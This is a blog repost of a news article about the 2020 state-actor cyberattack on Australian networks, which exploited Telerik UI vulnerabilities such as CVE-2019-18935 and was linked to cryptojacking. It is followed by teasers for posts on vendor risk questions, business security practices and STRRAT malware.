Skip to main content

Massive Cyberattack on Australia Uses Cryptojacking Exploits


Massive Cyberattack on Australia Uses Cryptojacking Exploits


Ransomware – What to do when you are attacked - Orlando, Maitland ...

The Australian Cyber Security Centre said a group of “state actors” hacked Australian networks on June 19 and one of the vulnerabilities they exploited is related to cryptojacking malware attacks. 
According to the 48-page report released on June 24, the threat actors exploited four critical vulnerabilities in Telerik UI, including CVE-2019-18935, which was recently leveraged by the Blue Mockingbird malware gang to infect thousands of systems with XMRRig, a Monero (XMR) mining software.

Vulnerability mostly used for cryptojacking purposes

Although the advisory didn’t say if hackers could have installed cryptojacking malware during the recent massive cyberattack, such vulnerability is the preferred one for the cybercriminals for installing crypto-mining applications within corporate networks. 
The report elaborates on the CVE-2019-18935 vulnerability, which also has similarities with the ones that Cointelegraph reported on the Blue Mockingbird’s attack, although it doesn’t imply that such gang participated in the cyberattack against Australia:
“Other exploit payloads were identified by the ACSC most commonly when the actor’s attempt at a reverse shell was unsuccessful. These included: a payload that attempted to execute a PowerShell reverse shell; a payload that attempted to execute certutil.exe to download another payload; a payload that executed binary malware (identified in this advisory as HTTPCore) previously uploaded by the actor but which had no persistence mechanism; a payload that enumerated the absolute path of the web root and wrote that path to a file within the web root.”

Were state-backed Chinese hacker groups behind the attack?

Almost 10 Chinese hacker groups - engaged with espionage activities and allegedly have connections with China’s government - have the PlugX malware among their weapons, which was one of the malware identified in the Australian government’s report.
Some Australian officials have suggested that China could be behind the massive cyberattack, as the diplomatic issues have been on the rise between the two countries. It was said the attack could have come after Australia sought for an investigation on the origin of the COVID-19 virus, something that was not well-received the dragon nation officials, as they considered it a “discriminatory” accusation and responded with trade retaliation against the Oceanic country.
The Chinese government has denied the claims.
  • #Tech
  • #Malware
  • #Crimes
  • #Cybersecurity

Comments

Post a Comment

Popular posts from this blog

Top 20 Most Asked Third Party Risk Questions for Vendors  These questions help organizations assess the overall risk posed by third-party vendors, covering critical areas like data protection, regulatory compliance, and incident response. Here’s a list of the Top 20 Most Asked Third-Party Risk Management (TPRM) Questions for Vendors in TPRM questionnaires: 1. What types of sensitive data do you handle for our organization? Vendors should clarify the types of data they collect, process, or store, such as personal information, financial data, or intellectual property. 2. How do you protect data at rest and in transit? This question probes into the encryption methods, protocols, and security controls in place for safeguarding data during storage and transmission. 3. Do you have a formal Information Security Program in place? Vendors should describe their overall cybersecurity framework, including policies, procedures, and governance. 4. How do you manage user access to our data and s...
Post a Comment
Read more

10 Important Cybersecurity Practices for your Business

  10 Important Cybersecurity Practices for your Business 1. EDUCATION  It’s much easier to prevent a hack than it is to recover from a hack. Once your company’s sensitive data is stolen through a ransomware attack, recovering it is often a long and arduous process. Teaching employees about basic security, personal cybersecurity, and the prevalence of cyber threats goes a long way in stopping ransomware attacks before they can really do damage. Your employees should understand that they might be targets of malicious actors, eager to exploit any entry they can find in your company. The average cost of a cyberattack is 3.86 million and the cumulative total for global cybercrime is expected to cost $6 trillion. If you don’t pay to train your employees about cybersecurity best practices eventually you may end up paying more in the long run. High quality and free trainings for your employees are available from several government resources including Department of Homeland S...
Post a Comment
Read more

Microsoft Warns of Data Stealing Malware That Pretends to Be Ransomware

  Thursday - Microsoft warned of a "massive email campaign" that's pushing a Java-based STRRAT malware to steal confidential data from infected systems while disguising itself as a ransomware infection. "This RAT is infamous for its ransomware-like behavior of appending the file name extension .crimson to files without actually encrypting them," the Microsoft Security Intelligence team  said  in a series of tweets. The new wave of attacks, which the company spotted last week, commences with spam emails sent from compromised email accounts with "Outgoing Payments" in the subject line, luring the recipients into opening malicious PDF documents that claim to be remittances, but in reality, connect to a rogue domain to download the STRRAT malware. Besides establishing connections to a command-and-control server during execution, the malware comes with a range of features that allow it to collect browser passwords, log keystrokes, and run remote commands an...
Post a Comment
Read more